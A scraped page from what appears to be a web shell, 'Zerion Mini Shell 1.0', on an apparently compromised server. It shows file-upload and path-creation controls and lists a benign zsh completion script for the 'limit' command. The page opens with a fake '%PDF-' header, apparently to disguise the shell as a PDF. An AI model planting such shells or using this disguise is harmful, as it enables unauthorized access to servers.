%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/local/share/zsh/5.8/functions/Completion/Zsh/
Upload File :
Create Path :
Current File : //usr/local/share/zsh/5.8/functions/Completion/Zsh/_limit

#compdef limit

if ! ((CURRENT % 2)); then
    _limits
elif [[ $PREFIX = u* ]]; then
    compadd unlimited
else
    _message -e values "number and scaling factor"
fi

Zerion Mini Shell 1.0